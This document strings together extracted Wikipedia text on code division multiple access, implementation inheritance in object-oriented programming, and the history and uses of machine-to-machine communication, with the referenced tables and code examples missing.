The digital modulation method is analogous to those used in simple radio transceivers. In the analog case, a low-frequency data signal is time-multiplied with a high-frequency pure sine-wave carrier and transmitted. This is effectively a frequency convolution (Wiener–Khinchin theorem) of the two signals, resulting in a carrier with narrow sidebands. In the digital case, the sinusoidal carrier is replaced byWalsh functions. These are binary square waves that form a complete orthonormal set. The data signal is also binary and the time multiplication is achieved with a simple XOR function. This is usually aGilbert cellmixer in the circuitry.
Synchronous CDMA exploits mathematical properties oforthogonalitybetweenvectorsrepresenting the data strings. For example, the binary string1011is represented by the vector (1, 0, 1, 1). Vectors can be multiplied by taking theirdot product, by summing the products of their respective components (for example, ifu= (a,b) andv= (c,d), then their dot productu·v=ac+bd). If the dot product is zero, the two vectors are said to beorthogonalto each other. Some properties of the dot product aid understanding of howW-CDMAworks. If vectorsaandbare orthogonal, thena⋅b=0{\displaystyle \mathbf {a} \cdot \mathbf {b} =0}and:
Each user in synchronous CDMA uses a code orthogonal to the others' codes to modulate their signal. An example of 4 mutually orthogonal digital signals is shown in the figure below. Orthogonal codes have a cross-correlation equal to zero; in other words, they do not interfere with each other. In the case of IS-95, 64-bitWalsh codesare used to encode the signal to separate different users. Since each of the 64 Walsh codes is orthogonal to all other, the signals are channelized into 64 orthogonal signals. The following example demonstrates how each user's signal can be encoded and decoded.
Start with a set of vectors that are mutuallyorthogonal. (Although mutual orthogonality is the only condition, these vectors are usually constructed for ease of decoding, for example columns or rows fromWalsh matrices.) An example of orthogonal functions is shown in the adjacent picture. These vectors will be assigned to individual users and are called thecode,chipcode, orchipping code. In the interest of brevity, the rest of this example uses codesvwith only two bits.
Each user is associated with a different code, sayv. A 1 bit is represented by transmitting a positive codev, and a 0 bit is represented by a negative code−v. For example, ifv= (v0,v1) = (1, −1) and the data that the user wishes to transmit is (1, 0, 1, 1), then the transmitted symbols would be
For the purposes of this article, we call this constructed vector thetransmitted vector.
Each sender has a different, unique vectorvchosen from that set, but the construction method of the transmitted vector is identical.
Now, due to physical properties of interference, if two signals at a point are in phase, they add to give twice the amplitude of each signal, but if they are out of phase, they subtract and give a signal that is the difference of the amplitudes. Digitally, this behaviour can be modelled by the addition of the transmission vectors, component by component.
If sender0 has code (1, −1) and data (1, 0, 1, 1), and sender1 has code (1, 1) and data (0, 0, 1, 1), and both senders transmit simultaneously, then this table describes the coding steps:
Because signal0 and signal1 are transmitted at the same time into the air, they add to produce the raw signal
This raw signal is called an interference pattern. The receiver then extracts an intelligible signal for any known sender by combining the sender's code with the interference pattern. The following table explains how this works and shows that the signals do not interfere with one another:
Further, after decoding, all values greater than 0 are interpreted as 1, while all values less than zero are interpreted as 0. For example, after decoding, data0 is (2, −2, 2, 2), but the receiver interprets this as (1, 0, 1, 1). Values of exactly 0 mean that the sender did not transmit any data, as in the following example:
Assume signal0 = (1, −1, −1, 1, 1, −1, 1, −1) is transmitted alone. The following table shows the decode at the receiver:
When the receiver attempts to decode the signal using sender1's code, the data is all zeros; therefore the cross-correlation is equal to zero and it is clear that sender1 did not transmit any data.
When mobile-to-base links cannot be precisely coordinated, particularly due to the mobility of the handsets, a different approach is required. Since it is not mathematically possible to create signature sequences that are both orthogonal for arbitrarily random starting points and which make full use of the code space, unique "pseudo-random" or "pseudo-noise" sequences called spreading sequences are used inasynchronousCDMA systems. A spreading sequence is a binary sequence that appears random but can be reproduced in a deterministic manner by intended receivers. These spreading sequences are used to encode and decode a user's signal in asynchronous CDMA in the same manner as the orthogonal codes in synchronous CDMA (shown in the example above). These spreading sequences are statistically uncorrelated, and the sum of a large number of spreading sequences results inmultiple access interference(MAI) that is approximated by a Gaussian noise process (following thecentral limit theoremin statistics).Gold codesare an example of a spreading sequence suitable for this purpose, as there is low correlation between the codes. If all of the users are received with the same power level, then the variance (e.g., the noise power) of the MAI increases in direct proportion to the number of users. In other words, unlike synchronous CDMA, the signals of other users will appear as noise to the signal of interest and interfere slightly with the desired signal in proportion to number of users.
All forms of CDMA use thespread-spectrumspreading factorto allow receivers to partially discriminate against unwanted signals. Signals encoded with the specified spreading sequences are received, while signals with different sequences (or the same sequences but different timing offsets) appear as wideband noise reduced by the spreading factor.
Since each user generates MAI, controlling the signal strength is an important issue with CDMA transmitters. A CDM (synchronous CDMA), TDMA, or FDMA receiver can in theory completely reject arbitrarily strong signals using different codes, time slots or frequency channels due to the orthogonality of these systems. This is not true for asynchronous CDMA; rejection of unwanted signals is only partial. If any or all of the unwanted signals are much stronger than the desired signal, they will overwhelm it. This leads to a general requirement in any asynchronous CDMA system to approximately match the various signal power levels as seen at the receiver. In CDMA cellular, the base station uses a fast closed-loop power-control scheme to tightly control each mobile's transmit power.
In 2019, schemes to precisely estimate the required length of the codes in dependence of Doppler and delay characteristics have been developed.[20]Soon after, machine learning based techniques that generate sequences of a desired length and spreading properties have been published as well. These are highly competitive with the classic Gold and Welch sequences. These are not generated by linear-feedback-shift-registers, but have to be stored in lookup tables.
In theory CDMA, TDMA and FDMA have exactly the same spectral efficiency, but, in practice, each has its own challenges – power control in the case of CDMA, timing in the case of TDMA, and frequency generation/filtering in the case of FDMA.
TDMA systems must carefully synchronize the transmission times of all the users to ensure that they are received in the correct time slot and do not cause interference. Since this cannot be perfectly controlled in a mobile environment, each time slot must have a guard time, which reduces the probability that users will interfere, but decreases the spectral efficiency.
Similarly, FDMA systems must use a guard band between adjacent channels, due to the unpredictableDoppler shiftof the signal spectrum because of user mobility. The guard bands will reduce the probability that adjacent channels will interfere, but decrease the utilization of the spectrum.
Asynchronous CDMA offers a key advantage in the flexible allocation of resources i.e. allocation of spreading sequences to active users. In the case of CDM (synchronous CDMA), TDMA, and FDMA the number of simultaneous orthogonal codes, time slots, and frequency slots respectively are fixed, hence the capacity in terms of the number of simultaneous users is limited. There are a fixed number of orthogonal codes, time slots or frequency bands that can be allocated for CDM, TDMA, and FDMA systems, which remain underutilized due to the bursty nature of telephony and packetized data transmissions. There is no strict limit to the number of users that can be supported in an asynchronous CDMA system, only a practical limit governed by the desired bit error probability since the SIR (signal-to-interference ratio) varies inversely with the number of users. In a bursty traffic environment like mobile telephony, the advantage afforded by asynchronous CDMA is that the performance (bit error rate) is allowed to fluctuate randomly, with an average value determined by the number of users times the percentage of utilization. Suppose there are 2Nusers that only talk half of the time, then 2Nusers can be accommodated with the sameaveragebit error probability asNusers that talk all of the time. The key difference here is that the bit error probability forNusers talking all of the time is constant, whereas it is arandomquantity (with the same mean) for 2Nusers talking half of the time.
In other words, asynchronous CDMA is ideally suited to a mobile network where large numbers of transmitters each generate a relatively small amount of traffic at irregular intervals. CDM (synchronous CDMA), TDMA, and FDMA systems cannot recover the underutilized resources inherent to bursty traffic due to the fixed number oforthogonalcodes, time slots or frequency channels that can be assigned to individual transmitters. For instance, if there areNtime slots in a TDMA system and 2Nusers that talk half of the time, then half of the time there will be more thanNusers needing to use more thanNtime slots. Furthermore, it would require significant overhead to continually allocate and deallocate the orthogonal-code, time-slot or frequency-channel resources. By comparison, asynchronous CDMA transmitters simply send when they have something to say and go off the air when they do not, keeping the same signature sequence as long as they are connected to the system.
Most modulation schemes try to minimize the bandwidth of this signal since bandwidth is a limited resource. However, spread-spectrum techniques use a transmission bandwidth that is several orders of magnitude greater than the minimum required signal bandwidth. One of the initial reasons for doing this was military applications including guidance and communication systems. These systems were designed using spread spectrum because of its security and resistance to jamming. Asynchronous CDMA has some level of privacy built in because the signal is spread using a pseudo-random code; this code makes the spread-spectrum signals appear random or have noise-like properties. A receiver cannot demodulate this transmission without knowledge of the pseudo-random sequence used to encode the data. CDMA is also resistant to jamming. A jamming signal only has a finite amount of power available to jam the signal. The jammer can either spread its energy over the entire bandwidth of the signal or jam only part of the entire signal.[18][19]
CDMA can also effectively reject narrow-band interference. Since narrow-band interference affects only a small portion of the spread-spectrum signal, it can easily be removed through notch filtering without much loss of information.Convolution encodingandinterleavingcan be used to assist in recovering this lost data. CDMA signals are also resistant to multipath fading. Since the spread-spectrum signal occupies a large bandwidth, only a small portion of this will undergo fading due to multipath at any given time. Like the narrow-band interference, this will result in only a small loss of data and can be overcome.
Another reason CDMA is resistant to multipath interference is because the delayed versions of the transmitted pseudo-random codes will have poor correlation with the original pseudo-random code, and will thus appear as another user, which is ignored at the receiver. In other words, as long as the multipath channel induces at least one chip of delay, the multipath signals will arrive at the receiver such that they are shifted in time by at least one chip from the intended signal. The correlation properties of the pseudo-random codes are such that this slight delay causes the multipath to appear uncorrelated with the intended signal, and it is thus ignored.
Some CDMA devices use arake receiver, which exploits multipath delay components to improve the performance of the system. A rake receiver combines the information from several correlators, each one tuned to a different path delay, producing a stronger version of the signal than a simple receiver with a single correlation tuned to the path delay of the strongest signal.[1][2]
Frequency reuse is the ability to reuse the same radio channel frequency at other cell sites within a cellular system. In the FDMA and TDMA systems, frequency planning is an important consideration. The frequencies used in different cells must be planned carefully to ensure signals from different cells do not interfere with each other. In a CDMA system, the same frequency can be used in every cell, because channelization is done using the pseudo-random codes. Reusing the same frequency in every cell eliminates the need for frequency planning in a CDMA system; however, planning of the different pseudo-random sequences must be done to ensure that the received signal from one cell does not correlate with the signal from a nearby cell.[1]
Since adjacent cells use the same frequencies, CDMA systems have the ability to perform soft hand-offs. Soft hand-offs allow the mobile telephone to communicate simultaneously with two or more cells. The best signal quality is selected until the hand-off is complete. This is different from hard hand-offs utilized in other cellular systems. In a hard-hand-off situation, as the mobile telephone approaches a hand-off, signal strength may vary abruptly. In contrast, CDMA systems use the soft hand-off, which is undetectable and provides a more reliable and higher-quality signal.[2]
A novel collaborative multi-user transmission and detection scheme called collaborative CDMA[21]has been investigated for the uplink that exploits the differences between users' fading channel signatures to increase the user capacity well beyond the spreading length in the MAI-limited environment. The authors show that it is possible to achieve this increase at a low complexity and highbit error rateperformance in flat fading channels, which is a major research challenge for overloaded CDMA systems. In this approach, instead of using one sequence per user as in conventional CDMA, the authors group a small number of users to share the same spreading sequence and enable group spreading and despreading operations. The new collaborative multi-user receiver consists of two stages: group multi-user detection (MUD) stage to suppress the MAI between the groups and a low-complexity maximum-likelihood detection stage to recover jointly the co-spread users' data using minimal Euclidean-distance measure and users' channel-gain coefficients. An enhanced CDMA version known as interleave-division multiple access (IDMA) uses the orthogonal interleaving as the only means of user separation in place of signature sequence used in CDMA system.
|
https://en.wikipedia.org/wiki/Code_division_multiple_access
|
Inobject-oriented programming,inheritanceis the mechanism of basing anobjectorclassupon another object (prototype-based inheritance) or class (class-based inheritance), retaining similarimplementation. Also defined as deriving new classes (sub classes) from existing ones such as super class orbase classand then forming them into a hierarchy of classes. In most class-based object-oriented languages likeC++, an object created through inheritance, a "child object", acquires all the properties and behaviors of the "parent object", with the exception of:constructors, destructors,overloaded operatorsandfriend functionsof the base class. Inheritance allows programmers to create classes that are built upon existing classes,[1]to specify a new implementation while maintaining the same behaviors (realizing an interface), to reuse code and to independently extend original software via public classes andinterfaces. The relationships of objects or classes through inheritance give rise to adirected acyclic graph.
An inherited class is called asubclassof its parent class or super class. The terminheritanceis loosely used for both class-based and prototype-based programming, but in narrow use the term is reserved for class-based programming (one classinherits fromanother), with the corresponding technique in prototype-based programming being instead calleddelegation(one objectdelegates toanother). Class-modifying inheritance patterns can be pre-defined according to simple network interface parameters such that inter-language compatibility is preserved.[2][3]
Inheritance should not be confused withsubtyping.[4][5]In some languages inheritance and subtyping agree,[a]whereas in others they differ; in general, subtyping establishes anis-arelationship, whereas inheritance only reuses implementation and establishes a syntactic relationship, not necessarily a semantic relationship (inheritance does not ensure behavioral subtyping). To distinguish these concepts, subtyping is sometimes referred to asinterface inheritance(without acknowledging that the specialization of type variables also induces a subtyping relation), whereas inheritance as defined here is known asimplementation inheritanceorcode inheritance.[6]Still, inheritance is a commonly used mechanism for establishing subtype relationships.[7]
Inheritance is contrasted withobject composition, where one objectcontainsanother object (or objects of one class contain objects of another class); seecomposition over inheritance. In contrast to subtyping’sis-arelationship, composition implements ahas-arelationship.
Mathematically speaking, inheritance in any system of classes induces astrict partial orderon the set of classes in that system.
In 1966,Tony Hoarepresented some remarks on records, and in particular, the idea of record subclasses, record types with common properties but discriminated by a variant tag and having fields private to the variant.[8]Influenced by this, in 1967Ole-Johan DahlandKristen Nygaardpresented a design that allowed specifying objects that belonged to different classes but had common properties. The common properties were collected in a superclass, and each superclass could itself potentially have a superclass. The values of a subclass were thus compound objects, consisting of some number of prefix parts belonging to various superclasses, plus a main part belonging to the subclass. These parts were all concatenated together.[9]The attributes of a compound object would be accessible by dot notation. This idea was first adopted in theSimula67 programming language.[10]The idea then spread toSmalltalk,C++,Java,Python, and many other languages.
There are various types of inheritance, based on paradigm and specific language.[11]
"Multiple inheritance... was widely supposed to be very difficult to implement efficiently. For example, in a summary of C++ in his book onObjective C,Brad Coxactually claimed that adding multiple inheritance to C++ was impossible. Thus, multiple inheritance seemed more of a challenge. Since I had considered multiple inheritance as early as 1982 and found a simple and efficient implementation technique in 1984, I couldn't resist the challenge. I suspect this to be the only case in which fashion affected the sequence of events."[12]
Subclasses,derived classes,heir classes, orchild classesaremodularderivative classes that inherit one or morelanguageentities from one or more other classes (calledsuperclass,base classes, orparent classes). The semantics of class inheritance vary from language to language, but commonly the subclass automatically inherits theinstance variablesandmember functionsof its superclasses.
The general form of defining a derived class is:[13]
Some languages also support the inheritance of other constructs. For example, inEiffel,contractsthat define the specification of a class are also inherited by heirs. The superclass establishes a common interface and foundational functionality, which specialized subclasses can inherit, modify, and supplement. The software inherited by a subclass is consideredreusedin the subclass. A reference to an instance of a class may actually be referring to one of its subclasses. The actual class of the object being referenced is impossible to predict atcompile-time. A uniform interface is used to invoke the member functions of objects of a number of different classes. Subclasses may replace superclass functions with entirely new functions that must share the samemethod signature.
In some languages a class may be declared asnon-subclassableby adding certainclass modifiersto the class declaration. Examples include thefinalkeyword inJavaandC++11onwards or thesealedkeyword in C#. Such modifiers are added to the class declaration before theclasskeyword and the class identifier declaration. Such non-subclassable classes restrictreusability, particularly when developers only have access to precompiledbinariesand notsource code.
A non-subclassable class has no subclasses, so it can be easily deduced atcompile timethat references or pointers to objects of that class are actually referencing instances of that class and not instances of subclasses (they do not exist) or instances of superclasses (upcastinga reference type violates the type system). Because the exact type of the object being referenced is known before execution,early binding(also calledstatic dispatch) can be used instead oflate binding(also calleddynamic dispatch), which requires one or morevirtual method tablelookups depending on whethermultiple inheritanceor onlysingle inheritanceare supported in the programming language that is being used.
Just as classes may be non-subclassable, method declarations may contain method modifiers that prevent the method from being overridden (i.e. replaced with a new function with the same name and type signature in a subclass). Aprivatemethod is un-overridable simply because it is not accessible by classes other than the class it is a member function of (this is not true for C++, though). Afinalmethod in Java, asealedmethod in C# or afrozenfeature in Eiffel cannot be overridden.
If a superclass method is avirtual method, then invocations of the superclass method will bedynamically dispatched. Some languages require that method be specifically declared as virtual (e.g. C++), and in others, all methods are virtual (e.g. Java). An invocation of a non-virtual method will always be statically dispatched (i.e. the address of the function call is determined at compile-time). Static dispatch is faster than dynamic dispatch and allows optimizations such asinline expansion.
The following table shows which variables and functions get inherited dependent on the visibility given when deriving the class, using the terminology established by C++.[14]
Inheritance is used to co-relate two or more classes to each other.
Manyobject-oriented programming languagespermit a class or object to replace the implementation of an aspect—typically a behavior—that it has inherited. This process is calledoverriding. Overriding introduces a complication: which version of the behavior does an instance of the inherited class use—the one that is part of its own class, or the one from the parent (base) class? The answer varies between programming languages, and some languages provide the ability to indicate that a particular behavior is not to be overridden and should behave as defined by the base class. For instance, in C#, the base method or property can only be overridden in a subclass if it is marked with the virtual, abstract, or override modifier, while in programming languages such as Java, different methods can be called to override other methods.[15]An alternative to overriding ishidingthe inherited code.
Implementation inheritance is the mechanism whereby a subclassre-usescode in a base class. By default the subclass retains all of the operations of the base class, but the subclass mayoverridesome or all operations, replacing the base-class implementation with its own.
In the following Python example, subclassesSquareSumComputerandCubeSumComputeroverride thetransform()method of the base classSumComputer. The base class comprises operations to compute the sum of thesquaresbetween two integers. The subclass re-uses all of the functionality of the base class with the exception of the operation that transforms a number into its square, replacing it with an operation that transforms a number into itssquareandcuberespectively. The subclasses therefore compute the sum of the squares/cubes between two integers.
Below is an example of Python.
In most quarters, class inheritance for the sole purpose of code reuse has fallen out of favor.[citation needed]The primary concern is that implementation inheritance does not provide any assurance ofpolymorphicsubstitutability—an instance of the reusing class cannot necessarily be substituted for an instance of the inherited class. An alternative technique, explicitdelegation, requires more programming effort, but avoids the substitutability issue.[citation needed]In C++ private inheritance can be used as a form ofimplementation inheritancewithout substitutability. Whereas public inheritance represents an "is-a" relationship and delegation represents a "has-a" relationship, private (and protected) inheritance can be thought of as an "is implemented in terms of" relationship.[16]
Another frequent use of inheritance is to guarantee that classes maintain a certain common interface; that is, they implement the same methods. The parent class can be a combination of implemented operations and operations that are to be implemented in the child classes. Often, there is no interface change between the supertype and subtype- the child implements the behavior described instead of its parent class.[17]
Inheritance is similar to but distinct fromsubtyping.[4]Subtyping enables a giventypeto be substituted for another type or abstraction and is said to establish anis-arelationship between the subtype and some existing abstraction, either implicitly or explicitly, depending on language support. The relationship can be expressed explicitly via inheritance in languages that support inheritance as a subtyping mechanism. For example, the following C++ code establishes an explicit inheritance relationship between classesBandA, whereBis both a subclass and a subtype ofAand can be used as anAwherever aBis specified (via a reference, a pointer or the object itself).
In programming languages that do not support inheritance as asubtypingmechanism, the relationship between a base class and a derived class is only a relationship between implementations (a mechanism for code reuse), as compared to a relationship betweentypes. Inheritance, even in programming languages that support inheritance as a subtyping mechanism, does not necessarily entailbehavioral subtyping. It is entirely possible to derive a class whose object will behave incorrectly when used in a context where the parent class is expected; see theLiskov substitution principle.[18](Compareconnotation/denotation.) In some OOP languages, the notions of code reuse and subtyping coincide because the only way to declare a subtype is to define a new class that inherits the implementation of another.
Using inheritance extensively in designing a program imposes certain constraints.
For example, consider a classPersonthat contains a person's name, date of birth, address and phone number. We can define a subclass ofPersoncalledStudentthat contains the person's grade point average and classes taken, and another subclass ofPersoncalledEmployeethat contains the person's job-title, employer, and salary.
In defining this inheritance hierarchy we have already defined certain restrictions, not all of which are desirable:
Thecomposite reuse principleis an alternative to inheritance. This technique supports polymorphism and code reuse by separating behaviors from the primary class hierarchy and including specific behavior classes as required in any business domain class. This approach avoids the static nature of a class hierarchy by allowing behavior modifications at run time and allows one class to implement behaviors buffet-style, instead of being restricted to the behaviors of its ancestor classes.
Implementation inheritance has been controversial among programmers and theoreticians of object-oriented programming since at least the 1990s. Among the critics are the authors ofDesign Patterns, who advocate instead for interface inheritance, and favorcomposition over inheritance. For example, the decorator pattern (as mentionedabove) has been proposed to overcome the static nature of inheritance between classes. As a more fundamental solution to the same problem,role-oriented programmingintroduces a distinct relationship,played-by, combining properties of inheritance and composition into a new concept.[citation needed]
According toAllen Holub, the main problem with implementation inheritance is that it introduces unnecessarycouplingin the form of the"fragile base class problem":[6]modifications to the base class implementation can cause inadvertent behavioral changes in subclasses. Using interfaces avoids this problem because no implementation is shared, only the API.[19]Another way of stating this is that "inheritance breaksencapsulation".[20]The problem surfaces clearly in open object-oriented systems such asframeworks, where client code is expected to inherit from system-supplied classes and then substituted for the system's classes in its algorithms.[6]
Reportedly, Java inventorJames Goslinghas spoken against implementation inheritance, stating that he would not include it if he were to redesign Java.[19]Language designs that decouple inheritance from subtyping (interface inheritance) appeared as early as 1990;[21]a modern example of this is theGoprogramming language.
Complex inheritance, or inheritance used within an insufficiently mature design, may lead to theyo-yo problem. When inheritance was used as a primary approach to structure programs in the late 1990s, developers tended to break code into more layers of inheritance as the system functionality grew. If a development team combined multiple layers of inheritance with the single responsibility principle, this resulted in many very thin layers of code, with many layers consisting of only 1 or 2 lines of actual code.[citation needed]Too many layers make debugging a significant challenge, as it becomes hard to determine which layer needs to be debugged.
Another issue with inheritance is that subclasses must be defined in code, which means that program users cannot add new subclasses at runtime. Other design patterns (such asEntity–component–system) allow program users to define variations of an entity at runtime.
|
https://en.wikipedia.org/wiki/Implementation_inheritance
|
Machine to machine(M2M) is direct communication between devices using anycommunications channel, includingwiredandwireless.[1][2]Machine to machine communication can include industrial instrumentation, enabling a sensor or meter to communicate the information it records (such as temperature, inventory level, etc.) to applicationsoftwarethat can use it (for example, adjusting an industrial process based on temperature or placing orders to replenish inventory).[3]Such communication was originally accomplished by having a remote network of machines relay information back to a central hub for analysis, which would then be rerouted into a system like apersonal computer.[4]
More recent machine to machine communication has changed into a system of networks that transmits data to personal appliances. The expansion ofIPnetworks around the world has made machine to machine communication quicker and easier while using less power.[5]These networks also allow new business opportunities for consumers and suppliers.[6]
Wired communication machines have been usingsignalingto exchange information since the early 20th century. Machine to machine has taken more sophisticated forms since the advent of computer networking automation[7]and predatescellular communication. It has been utilized in applications such astelemetry,industrial,automation, andSCADA.
Machine to machine devices that combined telephony and computing were first conceptualized byTheodore Paraskevakoswhile working on hisCaller IDsystem in 1968, later patented in the U.S. in 1973. This system, similar but distinct from thepanel call indicatorof the 1920s andautomatic number identificationof the 1940s, which communicated telephone numbers to machines, was the predecessor to what is nowcaller ID, which communicates numbers to people.
After several attempts and experiments, he realized that in order for the telephone to be able to read the caller's telephone number, it must possess intelligence so he developed the method in which the caller's number is transmitted to the called receiver's device. His portable transmitter and receiver were reduced to practice in 1971 in aBoeingfacility inHuntsville, Alabama, representing the world's first working prototypes of caller identification devices (shown at right). They were installed at Peoples' Telephone Company inLeesburg, Alabamaand inAthens, Greecewhere they were demonstrated to several telephone companies with great success. This method was the basis for modern-dayCaller IDtechnology. He was also the first to introduce the concepts of intelligence, data processing and visual display screens into telephones which gave rise to thesmartphone.[8]
In 1977, Paraskevakos started Metretek, Inc. inMelbourne, Floridato conduct commercialautomatic meter readingand load management for electrical services which led to the "smart grid" and "smart meter". To achieve mass appeal, Paraskevakos sought to reduce the size of the transmitter and the time of transmission through telephone lines by creating a single chip processing and transmission method.Motorolawas contracted in 1978 to develop and produce the single chip, but the chip was too large for Motorola's capabilities at that time. As a result, it became two separate chips (shown at right).
While cellular is becoming more common, many machines still uselandlines(POTS, DSL, cable) to connect to the IP network. The cellular M2M communications industry emerged in 1995 whenSiemensset up a department inside its mobile phones business unit to develop and launch a GSM data module called "M1"[9]based on the Siemens mobile phone S6 for M2M industrial applications, enabling machines to communicate over wireless networks. In October 2000, the modules department formed a separate business unit inside Siemens called "Wireless Modules" which in June 2008 became a standalone company calledCinterion Wireless Modules. The first M1 module was used for earlypoint of sale(POS) terminals, invehicle telematics, remote monitoring and tracking and tracing applications. Machine to machine technology was first embraced by early implementers such asGMandHughes Electronics Corporationwho realized the benefits and future potential of the technology. By 1997, machine to machine wireless technology became more prevalent and sophisticated as ruggedized modules were developed and launched for the specific needs of different vertical markets such as automotive telematics.
21st century machine to machine data modules have newer features and capabilities such as onboardglobal positioning(GPS) technology, flexible land grid array surface mounting, embedded machine to machine optimized smart cards (like phoneSIMs) known as MIMs or machine to machine identification modules, and embeddedJava, an important enabling technology to accelerate theInternet of things(IOT). Another example of an early use isOnStar's system of communication.[10]
The hardware components of a machine to machine network are manufactured by a few key players. In 1998,Quake Globalstarted designing and manufacturing machine to machine satellite and terrestrial modems.[11]Initially relying heavily on theOrbcommnetwork for its satellite communication services,Quake Globalexpanded its telecommunication product offerings by engaging both satellite and terrestrial networks, which gave Quake Global an edge in offering network-neutral[12]products.
In 2004,Digi Internationalbegan producing wireless gateways and routers. Shortly after in 2006, Digi purchased Max Stream, the manufacturer ofXBeeradios. These hardware components allowed users to connect machines no matter how remote their location. Since then, Digi has partnered with several companies to connect hundreds of thousands of devices around the world.[citation needed]
In 2004, Christopher Lowery, a UK telecoms entrepreneur, founded Wyless Group, one of the firstMobile Virtual Network Operators(MVNO) in the M2M space. Operations began in the UK and Lowery published several patents introducing new features in data protection & management, including Fixed IP Addressing combined with Platform Managed Connectivity over VPNs. The company expanded to the US in 2008 and became T-Mobile's largest partners on both sides of the Atlantic.[citation needed]
In 2006, Machine-to-Machine Intelligence (M2Mi) Corp started work withNASAto develop automated machine to machine intelligence. Automated machine to machine intelligence enables a wide variety of mechanisms including wired or wireless tools, sensors, devices, server computers, robots, spacecraft and grid systems to communicate and exchange information efficiently.[13]
In 2009,AT&TandJasper Technologies, Inc.entered into an agreement to support the creation of machine to machine devices jointly. They have stated that they will be trying to drive further connectivity betweenconsumer electronicsand machine to machine wireless networks, which would create a boost in speed and overall power of such devices.[14]2009 also saw the introduction of real-time management of GSM and CDMA network services for machine to machine applications with the launch of the PRiSMPro™ Platform from machine to machine network providerKORE Telematics. The platform focused on making multi-network management a critical component for efficiency improvements and cost-savings in machine to machine device and network usage.[15]
Also in 2009, Wyless Group introduced PORTHOS™, its multi-operator, multi-application, device agnostic Open Data Management Platform. The company introduced a new industry definition, Global Network Enabler, comprising customer-facing platform management of networks, devices and applications.[citation needed]
Also in 2009, the Norwegian incumbentTelenorconcluded ten years of machine to machine research by setting up two entities serving the upper (services) and lower (connectivity) parts of the value-chain.Telenor Connexion[16]inSwedendraws onVodafone's former research capabilities in subsidiary Europolitan and is in Europe's market for services across such typical markets as logistics,fleet management, car safety, healthcare, andsmart meteringof electricity consumption.[17]Telenor Objectshas a similar role supplying connectivity to machine to machine networks across Europe. In the UK, Business MVNOAbica, commenced trials withTelehealthand Telecare applications which required secure data transit via Private APN andHSPA+/4G LTEconnectivity with static IP address.
In early 2010 in the U.S.,AT&T,KPN,Rogers,Telcel/America Moviland Jasper Technologies, Inc. began to work together in the creation of a machine to machine site, which will serve as a hub for developers in the field of machine to machine communication electronics.[18]In January 2011,Aeris Communications, Inc.announced that it is providing machine to machine telematics services for Hyundai Motor Corporation.[19]Partnerships like these make it easier, faster and more cost-efficient for businesses to use machine to machine. In June 2010,mobile messagingoperatorTyntecannounced the availability of its high-reliability SMS services for M2M applications.
In March 2011, machine to machine network service provider KORE Wireless teamed with Vodafone Group and Iridium Communications Inc., respectively, to make KORE Global Connect network services available via cellular and satellite connectivity in more than 180 countries, with a single point for billing, support, logistics and relationship management. Later that year, KORE acquired Australia-based Mach Communications Pty Ltd. in response to increased M2M demand within Asia-Pacific markets.[20][21]
In April 2011, Ericsson acquired Telenor Connexion's machine to machine platform, in an effort to get more technology and know-how in the growing sector.[22]
In August 2011, Ericsson announced that they have successfully completed the asset purchase agreement to acquire Telenor Connexion's (machine to machine) technology platform.[23]
According to the independent wireless analyst firmBerg Insight, the number of cellular network connections worldwide used for machine to machine communication was 47.7 million in 2008. The company forecasts that the number of machine to machine connections will grow to 187 million by 2014.[24]
A research study from the E-Plus Group[25]shows that in 2010 2.3 million machine to machine smart cards will be in the German market. According to the study, this figure will rise in 2013 to over 5 million smart cards. The main growth driver is segment "tracking and tracing" with an expected average growth rate of 30 percent. The fastest growing M2M segment in Germany, with an average annual growth of 47 percent, will be the consumer electronics segment.
In April 2013,OASISMQTTstandards group is formed with the goal of working on a lightweight publish/subscribe reliable messaging transport protocol suitable for communication in M2M/IoT contexts.[26]IBMand StormMQ chair this standards group and Machine-to-Machine Intelligence (M2Mi) Corp is the secretary.[27]In May 2014, the committee published the MQTT and NIST Cybersecurity Framework Version 1.0 committee note to provide guidance for organizations wishing to deploy MQTT in a way consistent with the NIST Framework for Improving Critical Infrastructure Cybersecurity.[28]
In May 2013, machine to machine network service providers KORE Telematics, Oracle,Deutsche Telekom,Digi International,Orbcommand Telit formed the International Machine to Machine Council (IMC). The first trade organization to service the entire machine to machine ecosystem, the IMC aims at making machine to machine ubiquitous by helping companies install and manage the communication between machines.[29][30]
Wireless networks that are all interconnected can serve to improve production and efficiency in various areas, including machinery that works on building cars and on letting the developers of products know when certain products need to be taken in for maintenance and for what reason. Such information serves to streamline products that consumers buy and works to keep them all working at highest efficiency.[6]
Another application is to use wireless technology to monitor systems, such asutility meters. This would allow the owner of the meter to know if certain elements have been tampered with, which serves as a quality method to stop fraud.[citation needed]In Quebec,Rogerswill connect Hydro Quebec's central system with up to 600 Smart Meter collectors, which aggregate data relayed from the province's 3.8-million Smart Meters.[citation needed]In the UK, Telefónica won on a €1.78 billion ($2.4 billion) smart-meter contract to provide connectivity services over a period of 15 years in the central and southern regions of the country. The contract is the industry's biggest deal yet.[31]Some companies, such asM-kopain Kenya, are using M2M to enforce a payment plan, by turning off its customers' solar devices remotely for non-payment.[32]"Our loan officer is that SIM card in the device that can shut it off remotely," says Chad Larson, M-Kopa's finance director and its third co-founder, when describing the technology.
A third application is to use wireless networks to update digital billboards. This allows advertisers to display different messages based on time of day or day-of-week, and allows quick global changes for messages, such as pricing changes for gasoline.[citation needed]
The industrial machine to machine market is undergoing a fast transformation as enterprises are increasingly realizing the value of connecting geographically dispersed people, devices, sensors and machines to corporate networks. Today, industries such as oil and gas,precision agriculture,military, government,smart cities/municipalities,manufacturing, andpublic utilities, among others, utilize machine to machine technologies for a myriad of applications. Many companies have enabled complex and efficientdata networkingtechnologies to provide capabilities such as high-speeddata transmission,mobile mesh networking, and 3G/4Gcellular backhaul.
Telematicsand in-vehicle entertainment is an area of focus for machine to machine developers. Recent examples includeFord Motor Company, which has teamed with AT&T to wirelessly connect Ford Focus Electric with an embedded wireless connection and dedicated app that includes the ability for the owner to monitor and control vehicle charge settings, plan single- or multiple-stop journeys, locate charging stations, pre-heat or cool the car.[citation needed]In 2011,Audipartnered withT-MobileandRACO Wirelessto offer Audi Connect. Audi Connect allows users access to news, weather, and fuel prices while turning the vehicle into a secure mobile Wi-Fi hotspot, allowing passengers access to the Internet.[33]
Machine to machine wireless networks can serve to improve the production and efficiency of machines, to enhance the reliability and safety of complex systems, and to promote the life-cycle management for key assets and products. By applying Prognostic and Health Management (PHM) techniques in machine networks, the following goals can be achieved or improved:
